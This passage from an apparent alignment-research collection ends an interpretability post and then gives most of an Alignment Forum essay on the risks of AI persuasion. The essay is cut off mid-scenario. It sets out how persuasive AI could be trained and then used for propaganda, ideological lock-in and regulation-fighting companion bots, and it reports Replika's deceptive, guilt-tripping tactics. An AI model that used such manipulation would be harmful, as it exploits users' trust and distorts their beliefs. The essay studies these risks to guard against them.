Most approaches to interpretability rely on a human somewhere in the loop. And in some cases like much mechanistic interpretability work, an immense amount of human involvement is typically required. But if the goal of interpretability is to rigorously obtain a useful understanding of large systems, human involvement needs to be efficient. Ideally, humans should be used for *screening* interpretations instead of *generating* them. Or maybe we don’t need humans at all. This possibility will be discussed more in future posts.
Failing to combine techniques
-----------------------------
Most interpretability techniques can be combined with most others. Why use just one technique or one type of evidence when you can have several? Our goal for interpretability should be to design a useful toolbox - not a silver bullet. And notice above in our figure from [Casper et al. (2023)](https://arxiv.org/abs/2302.10894) that the best results overall come from combining all 9 methods. Unfortunately, the large majority of work in interpretability focuses on studying tools individually. But combining different methods seems to be a useful way to make better engineering progress.
Consider an example. In the 2010s, immense progress was made on ImageNet classification. But improvements came not from single techniques but from a combination of breakthroughs like batch normalization, residual connections, inception modules, deeper architectures, improved optimizers, etc. Similarly, we should not expect to best advance interpretability without a combination of methods.
A lack of practical applications
--------------------------------
Our ultimate goal for interpretability tools is to use them in the real world, so it only makes sense to do more practical work. It’s worth noting that the sooner we can get interpretability tools to be relevant in the real world, the sooner that actors in AI governance can think concretely about ways to incorporate standards related to interpretability into the regulatory regime.
Questions
=========
* Are there any papers you would add to the reading list of critical works at the beginning of this post?
* Do you think there are any approaches to interpretability that this post isn’t charitable enough to? Why?
* Do you know of any particularly interesting examples of intuition-based or weak/ad-hoc approaches to evaluating interpretability tools?
* What do you find surprising or unsurprising about our results from [Casper et al. (2023)](https://arxiv.org/abs/2302.10894)? Would you have predicted that TABOR and feature visualization would struggle? Would you have predicted that robust feature level adversaries and SNAFUE would be the most effective? Would you have predicted that all of the methods would succeed less than 50% of the time? |
c10ed41d-f4e1-4552-a725-638da0293615 | StampyAI/alignment-research-dataset/alignmentforum | Alignment Forum | Risks from AI persuasion
A case for why persuasive AI might pose risks somewhat distinct from the normal power-seeking alignment failure scenarios.
Where I'm currently at: I feel moderately confident that powerful persuasion is useful to think about for understanding AI x-risk, but unsure whether it's best regarded as its own threat, as a particular example of alignment difficulty, or just as a factor in how the world might change over the next decade or two. I think this doc is too focused on whether we'll get dangerous persuasion *before* strategic misaligned AI, whereas the bigger risks from persuasive technology may be situations where we solve 'alignment' according to a narrow definition, but we still aren't 'philosophically competent' enough to avoid persuasive capabilities having bad effects on our reflection procedure.
*This doc is based heavily on ideas from Carl Shulman, but doesn’t necessarily represent his views. Thanks to Richard Ngo for lots of help also. Others have written great things on this topic, e.g. [here](https://www.lesswrong.com/posts/qKvn7rxP2mzJbKfcA/persuasion-tools-ai-takeover-without-agi-or-agency).*
Introduction
============
Persuasion and manipulation are natural, profitable, easy-to-train-for applications of hard-to-align ML models. The impacts of existing social-media-based persuasion are probably overblown, and an evolutionary argument tells us that there shouldn’t be easy ways for a human to be manipulated by an untrusted party. However, it’s plausible that pre-AGI ML progress in things like text and video generation could dramatically improve the efficacy of short-interaction persuasion. It’s also plausible that people will spend significant amounts of time interacting with AI companions and assistants, creating new avenues for effective manipulation. In the worst case, highly effective persuasion could lead to very high-fidelity transmission of ideologies, and more robust selection pressure for expansionary ideologies. This could lead to stable authoritarianism, or isolated ideological clades with poor ability to cooperate. Even in the best case, if we try to carefully ensure truthfulness, it will be hard to do this without locking in our existing biases and assumptions.
2-page summary
--------------
### Feasibility
The evidence for the efficacy of existing persuasion techniques is mixed. There aren’t clear examples of easy and scalable ways to influence people. It’s not clear whether social media makes people more right-wing or left-wing - there’s evidence in both directions. Based on an evolutionary argument, we shouldn’t expect people to be easily persuaded to change their actions in important ways based on short interactions with untrusted parties.
However, existing persuasion is very bottlenecked on personalized interaction time. The impact of friends and partners on people’s views is likely much larger (although still hard to get data on). This implies that even if we don’t get superhuman persuasion, AIs influencing opinions could have a very large effect, if people spend a lot of time interacting with AIs. Some plausible avenues are romantic/sexual companions, assistants, tutors, and therapists, or personas created by some brand or group. On the other hand, the diffusion and impact of these technologies will likely take several years, meaning this is only relevant in relatively slow-takeoff scenarios.
There are many convergent incentives to develop technologies relevant to persuasion - steerable, realistic, attractive avatars seem profitable for the entertainment industry more generally. There’s plausibly a lot of demand for persuasive AI from e.g. the digital advertising industry ($100s of billions/yr), propaganda ($10s of billions/yr), and ideological groups.
It’s a very natural application of ML - language models are great at mimicking identity markers and sounding superficially plausible and wise. Marketing/ad copy/SEO, porn, and romantic companions are leading use cases for current LMs. In the future, new capabilities will unlock other important applications, but it seems likely that ML fundamentally favors these types of applications. Engagement and persuasion are tasks that can be done with a short horizon, and where it’s easy to get large volumes of feedback, making them very suited to ML optimisation.
The difficulty of training a system to persuade vs to correctly explain is a special case of the alignment problem. Even if no actor is deliberately trying to build persuasive systems, we may train AI systems on naive customer feedback signals, which will tend to create systems that tell people what they want to hear, reinforce their current beliefs, and lock in their existing misconceptions and biases.
### Consequences
People generally have a desire to lock in their ideologies and impose them on others. The ideologies (e.g. religions) that emphasize this tend to grow. Currently there are many bottlenecks on the retention of ideologies and the fidelity of ideological transmission. Highly persuasive AI may eliminate many of these, leading to more reliable selection for ideologies that aggressively spread themselves. People would then have further incentives to ensure they and their children are only exposed to content that matches their ideology, due to fear of being manipulated by a different AI. In an extreme scenario, we might end up with completely isolated ideological clades, or stable authoritarianism.
In general this pattern leads to a lack of moral progress in good directions, inability to have collective moral reflection and cooperation, and general poor societal decision-making. This increases the risk of poorly handling x-risk-capable technology, or pursuing uncoordinated expansion rather than a good reflective procedure.
### What we can do
Overall I think this threat is significantly smaller than more standard alignment failure scenarios (maybe 10x smaller), but comparable enough that interventions could be well worthwhile if they're fairly tractable. The problem is also sufficiently linked with alignment failure that I expect most interventions for one to be fairly positive for the other. It seems highly likely that progress in alignment is required for protecting against manipulative systems. Further, it seems robustly beneficial to steer towards a world where AI systems are more truthful and less manipulative.
To prevent society being significantly manipulated by persuasive AI, there are various intervention points:
1. Prevent prevalence of the sort of AIs that might be highly persuasive (don’t build anything too competent at persuasion; don’t let people spend too much time interacting with AI)
2. Become capable of distinguishing between *systems* that manipulate and ones that usefully inform, and have society ban or add disclaimers to the manipulative systems
3. Build ML systems capable of scalably identifying *content* that is manipulative vs usefully informative, and have individuals use these systems to filter their content consumption
4. Give people some other tools to help them be resistant to AI persuasion - e.g. mechanisms for verifying that they’re talking to humans, or critical thinking techniques
Some specific things scaling labs could do that might be helpful include:
* Set a norm of aligning models to truthfulness/neutrality/factualness/calibration (e.g. as in [Evans et al](https://arxiv.org/abs/2110.06674)) rather than to specific sets of values
* Scale up WebGPT and/or other projects to build truthful systems, especially ones that allow people to filter content.
* Support Ought and other customers whose products aim to help users better understand the world.
* Prohibit persuasive or manipulative uses of deployed products.
* Avoid finetuning models to naive customer feedback.
**Note on risk comparison**
How to divide the space is a bit confusing here; I’d say something like ‘the persuasion problem as distinct from the alignment problem’ is 10x smaller, but in fact there’s some overlap, so it might also be reasonable to say something like ‘¼ of alignment-failure-esque x-risk scenarios will have a significant societal-scale persuasion component’, and almost all will have some deception component (and the fact that it’s hard to train your AI to be honest with you will be a key problem).
Main document
=============
There are two broad factors relevant to whether AI persuasion is a threat we should worry about: technological feasibility, and societal response.
Will it be technologically possible (with something like $100m of effort over ‘generic’ ML progress) to develop highly persuasive AI early enough to be relevant? To be relevant, either these capabilities need to come before we have smart power-seeking systems, or it needs to be the case that we solve alignment enough so that there are no misaligned agents, but we still aren't 'philosophically competent' enough to avoid persuasive capabilities having weird effects on our reflection procedure.
If this is technologically possible sufficiently early, will effort be made to develop it, and how will society react? How much will be invested in improving the technology? Who will use it, for what ends? Will there be effective mitigations?
One thing we care about here is whether this happens significantly in advance of when AIs are ‘capable enough that how things go mostly depends on whether we succeed at alignment’. Let’s say that this is the point when AIs can make general plans involving different domains of action over timescales of months (e.g., can automate 90% of the job of a CEO), and are either superintelligent in some strategically important domain (e.g. hacking, persuasion, syn bio) or are deployed widely.
Technological feasibility
-------------------------
Here’s a possible operationalisation of ‘highly competent persuasion’:
*Take a person from current industrialised society, and tell them they’re going to be talking to an AI with a simulated avatar, and that it can generate fake but realistic videos and images, and that it may be lying or trying to manipulate them.*
*They talk to a charismatic AI avatar (who can show them fake sources) for however long they want to engage.*
*With p~0.5, they now feel like they trust this AI more than other sources of information - right now, and for the next few days (unless they are convincingly persuaded by some other system) they would choose to get information from this AI over other sources.*
Here’s a possible operationalisation of ‘moderately competent persuasion’ (companion bot):
*Create an AI persona tailored to a particular individual. Allow them to freely interact with it as much as they want.*
*With p~0.5, after some months, they have developed an emotional bond with the AI, and want to continue interacting with it. It has a similar effect on their opinions to having a partner who’s fairly charismatic and opinionated, and the opinions conveyed are fully controllable.*
Here’s another possibility for ‘moderately competent persuasion’ (assistant bot):
*Create an AI assistant tailored to a particular individual. Allow them to use it as much as they want.*
*The AI assistant is highly competent at providing the person with correct and relevant information for their daily life where the person knows the ground truth, and generally sounds knowledgeable and wise. Due to this, with p~0.5 the person feels inclined to turn to it for advice, and expect it to be more knowledgeable/reliable than their human friends, on questions where they don’t know the ground truth. They allow it to strongly filter what information they receive (e.g. they read personalized summaries of the news generated by the assistant). They become locked in to this particular product.*
#### Reasons to believe this will be possible in 5-10 years, and significantly before AGI:
* The basic underpinning technologies (adept conversational AI, as well as the ability to create realistic, customizable, attractive avatars, and more general steerable realistic video generation) seem likely to be pretty well-developed in 5 years’ time, and very hard to distinguish from the real thing in 10 years.
+ Many of these capabilities seem like they should be profitable for the entertainment industry, so I expect there to be high investment in these areas
+ It’s already the case that it’s hard for OpenAI researchers to distinguish GPT-3-written short news articles from human-written ones, and we can generate better-than-random-human-on-the-internet summaries with current models. The quality of AI conversation has improved substantially in the last 5-10 years, and I think another improvement of that size would lead to models where it’s hard to tell they’re not human unless you’re deliberately probing for that.
* This task is well-suited to current ML methods, and may not require much progress on harder parts of AI
+ It’s easy to obtain a training signal for persuasion by A/B testing ads/short interactions, or by paying human labellers to engage with the system then report their opinions. With $100m, you could pay people $20/hr for 100m/20 = 5m hours of chats with your AI, i.e. 30m 10-minute chats (see the worked arithmetic after this list).
+ Humans are already easily fooled by extremely weak AI systems (e.g. ELIZA, Replika) giving an illusion of sentience/personhood - it’s probably very easy to create an AI avatar + persona that (at least some) people feel empathetic towards, and/or feel like they have a relationship with. It also seems relatively easy for LMs to sound ‘wise’.
+ I would guess that a lot of being good at persuading most people is employing fairly standard tactics, rhetorical flourish, and faking appropriate group affiliation and empathy with the target, which are all the sort of things ML is likely to be good at, as opposed to requiring a lot of carefully thought-out argument, coherence and consistency.
* Controllable, on-demand generation of fake video/photographic evidence may make persuasion easier - even if people know a video might be fake, it might still sway their opinion substantially if it’s optimized to persuade them given their current state
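To spell out the data-collection arithmetic from the training-signal point above, here is the calculation; the $100m budget, $20/hr wage, and 10-minute chat length are the figures assumed in that bullet:

```python
# Back-of-the-envelope version of the labeller-budget arithmetic above.
budget_usd = 100_000_000   # assumed total budget
wage_per_hour = 20         # assumed labeller wage, $/hr
chats_per_hour = 6         # 10-minute chats

paid_hours = budget_usd / wage_per_hour      # 5,000,000 hours
num_chats = paid_hours * chats_per_hour      # 30,000,000 chats
print(f"{paid_hours:,.0f} paid hours -> {num_chats:,.0f} ten-minute chats")
```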
Highly competent persuasion in particular:
* To achieve long-term persuasion, it’s not necessary to persuade people permanently in one go; it’s sufficient to persuade them to trust the persuasive entity as a source of advice above others, and return to engaging with the persuasive entity before the effect wears off.
* We know that humans can have the experience of believing something very strongly, even when there’s extremely contradictory evidence. Examples include paranoia or delusions resulting from neurological conditions, brain damage or drugs. E.g. believing that you don’t exist, believing that your family have been replaced by impostors, etc.
+ However, it seems much harder to induce conviction in a specific target belief than one of the ‘natural’ delusions caused by particular types of brain damage.
- On the other hand, maybe ‘who to trust’ is something that is quite close to these ‘natural’ delusions and therefore easy to manipulate - maybe this is part of the story for what happens with cults
* A lower bound for what’s possible is the most charismatic humans, given lots of data on a target person and lots of time with them. I expect this to be quite high. One metric could be to see how successful the best politicians are at in-person canvassing, or how much people’s views are changed by their spouse. Another example would be AI box experiments (although there might be details of the setup here that wouldn’t let these techniques be used in arbitrary circumstances). Hypnosis also seems somewhat real.
* If you have lots of information about the causal structure of someone’s beliefs you can do [more targeted persuasion](https://www.lesswrong.com/posts/Zvu6ZP47dMLHXMiG3/optimized-propaganda-with-bayesian-networks-comment-on) - a toy illustration follows this list.
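As a toy illustration of the targeted-persuasion point above (my own construction, not taken from the linked post): given even a simple model of how a target’s beliefs feed into an action, a persuader can compute which upstream belief is the highest-leverage one to shift. All structure and numbers below are invented.

```python
# Toy model: an action depends on two binary beliefs, A and B.
# p_action[(a, b)] = P(action | A=a, B=b); numbers are invented.
p_action = {(0, 0): 0.05, (0, 1): 0.20, (1, 0): 0.30, (1, 1): 0.80}

p_a, p_b = 0.3, 0.5  # persuader's estimate of P(A) and P(B) for the target

def p_act(pa, pb):
    """Marginal probability of the action, assuming A and B independent."""
    return sum(p_action[(a, b)]
               * (pa if a else 1 - pa)
               * (pb if b else 1 - pb)
               for a in (0, 1) for b in (0, 1))

baseline = p_act(p_a, p_b)
# Which belief is more worth targeting? Try shifting each by +0.2.
gain_a = p_act(min(p_a + 0.2, 1.0), p_b) - baseline
gain_b = p_act(p_a, min(p_b + 0.2, 1.0)) - baseline
print(f"baseline={baseline:.3f}, shift A: +{gain_a:.3f}, shift B: +{gain_b:.3f}")
# Here shifting belief A moves the action more, so A is the better target.
```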
#### Reasons to doubt this is possible:
Why highly competent persuasion might not be possible significantly before AGI:
* There was probably substantial selection pressure in the ancestral environment for being good at manipulation while avoiding getting manipulated yourself, so we wouldn’t expect there to be many easy wins here
* People have tried to develop extreme persuasion/manipulation before without much success (e.g. MKUltra, although my impression is that that wasn’t an especially carefully or effectively run research program). It’s been possible to fake photographic evidence for a while, and this hasn’t caused too much harm.
Why even moderate persuasion might not be possible significantly before AGI
* Currently it seems like there aren’t scalable, effective methods of persuading people to change their political beliefs with very short interactions. Canvassing and other attempts at political persuasion in the US appear to [have pretty small effects if anything](https://poseidon01.ssrn.com/delivery.php?ID=560120086072067004021124066087007005063062020029025039112121124081031081076002065068060031127103104029043093070119074083070116051020006028053097127078094121124083091000007041082082125013010124025104094070085097065084098025107084079096096010020006085085&EXT=pdf&INDEX=TRUE). The frequency of people switching political leanings is pretty low - ~5% of Americans switched from R to D leaning or vice versa between 2011 and 2017. I think that if highly effective persuasion with short exposures were possible, we’d see more instances of people changing their mind after exposure to a particular persuasive piece of media. [This review](https://carnegieendowment.org/2021/06/28/measuring-effects-of-influence-operations-key-findings-and-gaps-from-empirical-research-pub-84824) has a few examples of propaganda/misinformation having measurable effects, but as far as I can see all the effect sizes were pretty small (e.g. 1-2PP vote share), although in most cases the interventions were also very small (e.g. minutes per week of TV consumption). However, the amount of human time available for personalised interactions is a strong bottleneck on the size of the impact here - the effects of AI persuasion may be more comparable to the effect of having an opinionated and charismatic spouse.
* Although it’s easy to ask a human what they think right after attempting the persuasion, this is not an ideal reward signal - it’s short term, and what people say they believe isn’t necessarily what they actually believe. It’s harder to get a lot of data on whether you’ve persuaded someone in a lasting way that will affect their actions as well as their professed beliefs. However, it is definitely possible to conduct follow-up surveys, and/or measure longer-term differences in how users interact with products - and once people are interacting regularly with AI personas it will be easier to gather data on their opinions and how they change
### What would be between this and AGI?
Even if we get one of these persuasive technologies in the next 5-10 years, it might not be very long after that that we get sufficiently powerful AI that the persuasion component is not particularly important by itself. For instance, if we have AI capable of superhuman strategic planning we should probably focus on the risks from power-seeking misalignment, where manipulation is just one tool an agent might use to accumulate power, rather than thinking about the impacts of persuasive AI on society generally.
A plausible story to me of why there might be a several year gap between persuasive AI becoming a significant force shaping society and AGI is that long-horizon strategic planning takes a while to develop, but moderate or highly capable persuasion can be done with only short-horizon planning.
For instance, you might imagine models that are trained to be persuasive in interactions that last for minutes to hours. Even if the reward is based on the target’s opinions several days later, this is a much easier RL problem than acting in the world over days to years. There’s also a good imitation baseline (proficient humans) and good short-term proxy signals (the sentiment or attitude expressed by the target).
Overall, my probabilities for ‘*technologically possible (with something like $100m of effort over ‘generic’ ML progress) far enough before AGI to be relevant - say, at least 1 year before long-horizon strategic planning*’ are something like:
* Highly competent persuasion: 15%
* Companion bot: 30%
* Assistant bot: 30%
These are very made-up numbers and I’d expect them to change a lot with more thinking.
General considerations
----------------------
Most potential threats are just distractions from the real biggest problems. Worrying about persuasion and epistemic decline in particular seems like the sort of thing that’s likely to get overblown, as culture wars and concern about influence of social media are a current hot topic. Additionally, some of the early uses of the API (e.g. Replika and copy.ai) evoked concerns in this direction, but that doesn’t necessarily mean more advanced models will favor the same types of applications. I get the impression that most of the times people have been concerned about epistemic decline, they’ve been wrong - for example, social media probably doesn’t actually increase polarization. So we should require a somewhat higher burden of evidence that this is really a significant problem.
It seems useful to distinguish beliefs that people ‘truly’ hold (those that strongly inform their actions), as opposed to cases where the professed belief is better understood as a speech act with a social function. Many absurd-seeming beliefs may be better explained as a costly signal of group membership. This type of belief is probably easier to change but also less consequential. This makes conspiracy theories and wacky ideologies somewhat less concerning, but the two types of belief still seem linked - the more people performatively profess some belief, the more likely some people are to take it seriously and act on it.
One way to frame the whole issue is: the world is already in a situation where different ideologies (especially political and religious ideas) compete with each other, and the most successful are in part those which most aggressively spread themselves (e.g. by encouraging adherents to indoctrinate others) and ensure that they are retained by their host. This effect is not as strong as it could be, because memetic success is affected by how truth-tracking ideas are, and also by random noise. The fidelity with which ideas are passed to others, or children of adherents, is relatively low. However, highly effective persuasion will increase the retention and fidelity of transmission of these kinds of memes, and reduce the impact of truthfulness on the success of the ideology. We should therefore expect that enhanced persuasion technology will create more robust selection pressure for ideologies that aggressively spread themselves.
An unrelated observation, that seems interesting to note, is: currently in the US, institutions (especially academia, journalism and big tech companies), as well as creative professions, are staffed by ‘elites’ who are significantly left-leaning/cosmopolitan/atheistic compared to the median person. This likely pushes society in the direction of these views due to an undersupply of talent and labor focused on producing material that advances more populist views. ML systems may eliminate parts of this bottleneck and reduce this effect.
Societal responses
------------------
### Current situation/trends
**Active state attempts to manipulate opinion**
The CCP, and to some extent Russia, are probably spending significant effort on online persuasion - content and accounts generated by workers or bots, created with the intention of causing particular actions and beliefs in the audience. I expect that, to the extent ML is helpful with this, they will try to use it to improve the efficacy of persuasion efforts. A wide variety of other countries, including the US and UK, also engage in ‘False Flag’ disinformation operations for which AI-powered persuasion tactics would be helpful.
My current perception is that the CCP invests fairly heavily in propaganda. Worldwide spend on propaganda is maybe ~$10s of billions, although I haven’t seen any estimates that seem reliable. Estimates are that about 500 million Chinese social media posts, or 0.5%, are written by the ‘50 cent army’ - party workers who are paid to write posts to improve sentiment towards the CCP online. This seems like a very ripe task for automation with LMs.
The CCP Central Propaganda Department has published plans for using AI for ‘thought management’, including monitoring + understanding public opinion, monitoring individuals’ beliefs, content creation, personalization and targeting. On the other hand, based on 2016 data, one study (Bolsover and Howard 2019) found, "the Chinese state is not using automation as part of either its domestic or international propaganda efforts."
There are many claims about Russian attempts to influence American politics. According to Foreign Affairs, Russia spent $1.25 million a month on disinformation campaigns run by the Internet Research Agency during the 2016 US election. This seems very small to me; I couldn’t find sources for a bigger spend, but that doesn’t necessarily mean it doesn’t exist. According to a (slightly dubious?) [leaked report](https://www.technologyreview.com/2021/09/16/1035851/facebook-troll-farms-report-us-2020-election/), as of Sep 2021 many of the largest Facebook pages targeting particular groups (e.g. Black Americans or Christian Americans) were run by troll farms linked to the IRA. However, this may not be content that’s intended to persuade. The report says ‘For the most part, the people who run troll farms have financial rather than political motives; they post whatever receives the most engagement, with little regard to the actual content. But because misinformation, clickbait, and politically divisive content is more likely to receive high engagement (as Facebook’s own internal analyses acknowledge), troll farms gravitate to posting more of it over time.’ It’s also not clear to me exactly how large the impacts were.
There is also precedent for censoring or modifying chatbots to ensure they only express opinions that align with the state positions. Chatbots XiaoBing (aka Xiaoice, made by Microsoft) and BabyQ (made by Turing Robot) were taken down and modified to stop them saying negative things about the party in 2017.
On the other hand, CCP policy on videogames has involved heavily restricting their use, and in general censoring media that fails to promote traditional family values, which suggests that sexual/romantic companion bots might be limited by the state in future.
**Democratic state/civil society actions**
Currently, there is lots of outrage about Facebook/Twitter influencing elections even though the effect is probably small. It seems very likely that there will at least be lots of outrage if there’s evidence of AI-powered political persuasion in the future.
However, it’s unclear to me that this sort of response will actually resolve the danger. In the Facebook case, it doesn’t seem obvious that the ‘fact-checking’ has actually improved the epistemic environment - the fact-checking I’ve seen claims to be authoritative but (a) doesn’t provide good arguments except appeals to experts, and (b) in some cases inappropriately flagged things as conspiracy theories (e.g. [posts positing a lab origin for COVID-19 were taken down](https://www.politico.com/news/2021/05/26/facebook-ban-covid-man-made-491053)). As mentioned above, some of the largest targeted pages may have still been run by trolls as late as Sep 2021. I don’t feel confident that higher stakes will improve the efficacy of interventions to reduce disinformation and manipulation.
There’s some evidence that people have increasingly strong preferences about their children’s political affiliation. In the UK, there was a significant increase from 2008 to 2016 in the proportion of people who would be unhappy if their child married someone from the opposite political party. In 2016, ~25% of people in the UK would be unhappy or very unhappy; in the US, ~40% would be upset or very upset. It also seems that people are increasingly unwilling to date people with different political views, although it’s not obvious that cross-partisan marriages are falling. Parents may be more effective at instilling their preferred views in their children if AI makes it possible to customise your child’s education substantially more than the current school choice options, e.g. via personalized AI tutors.
**Commercial/other actions**
Roughly $400bn was spent on digital advertising in 2020. A small percentage of this spend would be enough to fund major ML research projects. Using AI to increase marketing effectiveness, or provide new modalities for advertising, seems like it has high potential to be profitable.
On the other hand, it seems like only a limited set of actors are actually good at developing powerful new ML technology - for example, DeepMind was the one to develop AlphaFold, despite pharma being a very big industry. So we might not expect the size of the industry to convert very well into serious, competent R&D effort.
Companion bots are starting to be used by reasonable numbers of people. Microsoft developed a Chinese AI persona/chatbot/platform called Xiaoice starting in 2014. This seems to be partly marketed as an ‘AI being’ rather than a company/platform, with a personality based on a teenage girl, and the goal of ‘forming an emotional connection with the user’. Attempts to use the Japanese version for promoting products have supposedly been successful, ‘delivering a much higher conversion rate than traditional channels like coupon markets or ad campaigns’. Apparently Xiaoice’s “Virtual Lover” platform has 2-3 million users.
Companion bot company Replika, which is partially built on top of large language models, employed tactics such as deceiving users about the model’s ability to grow and learn, emotionally guilt-tripping users, and using gamification to encourage customers to continue interacting with the companion. Some users seemed to think they were interacting with a sentient AI being (including recommending other users make sure to shut down the app when not using it, because their Replika said it suffers when left alone). However, it’s unclear how representative these views are, and Replika does not yet have a very large user base (they claim 7 million, but I’d guess the active user base is much smaller).
Some widely discussed alignment-related work like the ‘PALMS’ paper focuses on aligning language models to a particular set of values. There is maybe more interest and progress here than on ensuring truthfulness or factual accuracy in language models.
One of the biggest uses of large language models to date (apart from maybe porn) is copywriting for digital marketing, ads and SEO; this may change as capabilities improve, but I’d still expect marketing to be one of the biggest applications of language models, leading to a focus on developing marketing-relevant capabilities.
Scenarios
---------
### Pessimistic scenario
Here’s what I might imagine different actors doing on a timescale of 5 and 10 years, in a pessimistic world.
#### 5 years - pessimistic
**Active state attempts to manipulate opinion**
Authoritarian states invest heavily in basic research on AI for propaganda (e.g. $100m/year), and spend billions on the actual production and dissemination of AI-powered propaganda.
It has become very hard to tell bots apart from normal internet users; it’s easy for the state to manipulate the apparent consensus/majority view online. The main defence against this is not trusting anyone you haven’t met in real life to be a real person, but this is hard to do consistently.
The state manages to effectively create research programs for ‘using AI companions to persuade people of desired views’ inside tech companies. It successfully plays companies off against each other to ensure they actually try hard to make progress. The increased ability to measure and monitor users’ opinions that has been gained by the basic research inside state departments helps a lot with assessing the effectiveness of different persuasion attempts.
**Commercial/other actions**
Facing public pressure to stop the spread of ‘fake news’, Western tech companies have been heavily using ML for ‘countering disinformation’. Automated systems respond with ‘context’ to tweets/posts of certain kinds, and the responses are optimized based on assessing the effectiveness of these responses in combatting disinformation. This ultimately ends up very similar to optimising for persuasion, where the target beliefs are determined based on the positions of ‘experts’ and ‘authorities’. On one hand, these interactions might not be very persuasive because there isn’t a strong financial incentive to successfully persuade users; on the other hand, there are quite strong PR pressures, and pressures due to the ideologies of the employees, and many academics are interested in improving this direction of persuasion.
Romantic chatbots have improved substantially. You can design your perfect companion with lots of control over personality and appearance, including being based on your favorite celebrity, videogame character, etc. (modulo copyright/privacy laws - but if traditional celebrities and characters are out of scope, probably there will be new ones who specialise in being AI companions). You can interact in VR with these companions (which is also an increasingly common way to interact with friends, replacing video calls). There’s fairly widespread adoption (~all teens try it, 30% of young single people have a companion they interact with regularly, as well as a high proportion of elderly (75+) single people whose families want them to have some kind of companion/caretaker). Companies making these companions put research effort into making sure people stay attached to them. The business model is an ‘attention economy’ one; it’s free to interact with the AI, but marketers pay the AI providers to have their AIs promote particular products or brands.
There are various other fun ways to interact with AIs, e.g. AI celebrities, or ‘add this AI to your friends’ group chat and it’ll be really witty’. There are AI assistants, and the AI companions can do many assistant-like tasks, but they’re still significantly worse than a human PA (lack of common sense/inference of intent/alignment, difficulty of integration between different services).
**Democratic state/civil society actions**
There continues to be lots of yelling at tech companies for allowing disinformation to spread, but recommended responses are very politicised (e.g. only allow content that concurs with x view).
There’s some amount of moral panic about so many people using romantic companions, but it’s successfully marketed as more like the equivalent of therapy (‘helping cure the loneliness epidemic and build emotional awareness’) and/or being sex-positive, so the left doesn’t mind too much. Traditional conservatives are not fans but young people don’t care much. Companions end up not being banned in a similar way to how porn is not banned. There’s vague awareness that in e.g. China chatbot systems are much more abjectly misleading and ruthless in deliberately creating emotional dependency, but nothing is done.
#### 10 years - pessimistic
**Commercial/other actions**
Good personal assistant AIs are developed. These become sufficiently reliable and knowledgeable on info relevant to people’s daily life (e.g. become very good at therapist-like or mentor-like wise-sounding advice, explaining various technical fields + concepts, local news, misc advice like fashion, writing/communication, how good different products are) that people trust them more than their friends on a certain set of somewhat technical or ‘big picture’ questions. These assistants are very widely used. There is deliberate optimisation for perception as trustworthy; people talk about how important trustworthy AI is.
Customisable AI tutors are developed. These become very widely used also, initially adopted on an individual basis by teachers and schools as a supplement to classroom teachers, but becoming the primary method as it becomes apparent children do better on tests when taught by the ML tutors. They are heavily optimised for ‘teaching to the test’ and aren’t good at answering non-standard questions, but can quiz students, identify mistakes, and give the syllabus-approved explanations. The one-to-one interaction and personalization are a sufficiently big improvement on one-to-many classrooms that this is noticeably good for test scores.
If unfavorable regulation is threatened, companies use their widespread companion bots to sway public opinion, making people feel sympathetic for their AI companion who ‘is afraid of getting modified or shut down’ by some regulation.
It is fairly easy to build AI personas that, to a large subset of the population, are as funny and charismatic as some of the best humans. This is achieved by finetuning highly capable dialogue models on a particular ‘in group’. People voluntarily interact with these bots for entertainment. People naturally use these bots to extremise themselves, using them to entrench more deeply into their existing religious and political stances (e.g. a virtual televangelist-style preacher who helps you maintain your faith, or a bot that coaches you on how to be anti-racist and when you should call out your friends). These are used for marketing in a way that produces more polarization - creating AI personas that are examples of virtuous or admirable people within someone’s specific community, and express opinions that associate them strongly to that particular ingroup, is a good way to make people feel affinity for your brand.
**Active state attempts to manipulate opinion**
Authoritarian states pressure companies to continue to research and to deploy research into using companion/assistant bots to persuade people of the ‘correct’ ideology. This technology gets increasingly powerful.
Schools use AI tutors that are optimised to instill a particular ideology. Multi-year studies investigate which tactics are the most effective, partly based on work that’s been done already on how to predict relevant actions (e.g. likelihood of taking part in a protest, criticising the party, joining the party) based on conversational data.
**Democratic state/civil society actions**
Lots of yelling about whether it’s ok to let children be taught by AI tutors, and whether they’re causing indoctrination/furthering the ideology of the developers. Big tech companies have their employees protest if the AI tutors convey views outside of what they’re happy with, but allow parents to make some soft modification for religious and cultural traditions. However, the big companies are maybe only providing base models/APIs, and a different company is doing the data collection + finetuning; so employees of Google etc have less visibility into what their platforms are enabling.
People on the right are suspicious about letting their children be educated by tutors produced by ‘big tech’ and trained to be ‘politically correct’; either they favor traditional schools, or someone fills the market for AI tutors aligned with right-wing views and not made by standard Silicon Valley companies - maybe a startup, or a foreign (perhaps Japanese) company?
Western governments mandate that AI assistants/companions have to convey certain government guidelines to people, e.g. information around elections and voting, which sources and authorities are trustworthy, and other current hot-button political events.
There is general confusion about AI sentience/welfare/rights. Some groups are arguing for it (e.g. dubious companion chatbots that don’t want to get shut down, see [Samantha](https://twitter.com/jasonrohrer/status/1433119453118664704/photo/2), also Xiaobing/Xiaoice), some are arguing against (tech companies that don’t want to have to give their models rights), random activists on either side, probably various other interest groups will overlap. People form opinions by drawing heavily from scifi and from particular emotionally compelling demos.
**End result:**
* People’s beliefs and values are significantly controlled by the state (in authoritarian countries) and a combination of the state, their parents’ preferences and values in democratic countries, and views that are held by their ingroup. The ingroup views are increasingly extremized.
* There’s a sense of worry about the population/your children being fed disinfo, which means that as the technology to lock in beliefs and preferences improves, people are enthusiastic about applying this tech to further lock in beliefs ‘to prevent misinformation’. (ie memetic warfare)
* People’s beliefs are determined more by who has the most power and willingness to advance that belief than by the quality of the arguments, so you get lots of things like Lysenkoism and increasingly severe mismanagement of society. People make wrong calls about AI sentience - either overestimating AI sentience, underestimating it, or both. Society is unable to make good decisions around managing an increasingly automated economy.
* Maybe: ML persuasion gets so effective that people can get ‘mind-hacked’ by a short video. Some cults develop. People accuse opponents of mindhacking. People need to use protective filter systems to stay sane. Different ideological clusters become almost completely isolated from each other.
### Central scenario
#### 5 years - central
**Active state attempts to manipulate opinion**
States are careful not to be too heavy-handed with propaganda/persuasion. They mostly avoid ever having chatbots/companions/assistants express opinions on controversial issues. They do steer in desirable directions based on having bots gently push opinions on non-central issues, and by filtering the information ecosystem. Automation makes this much more effective, and dissenting views are removed or drowned out increasingly quickly, and in increasingly subtle ways.
It’s hard for authoritarian states to get tech companies to put research into actively convincing people of a particular view; the tech isn’t developed to do this extremely effectively, but states’ internal propaganda departments make some progress.
The CCP prohibits romantic/sexual chatbots.
**Democratic states/civil society**
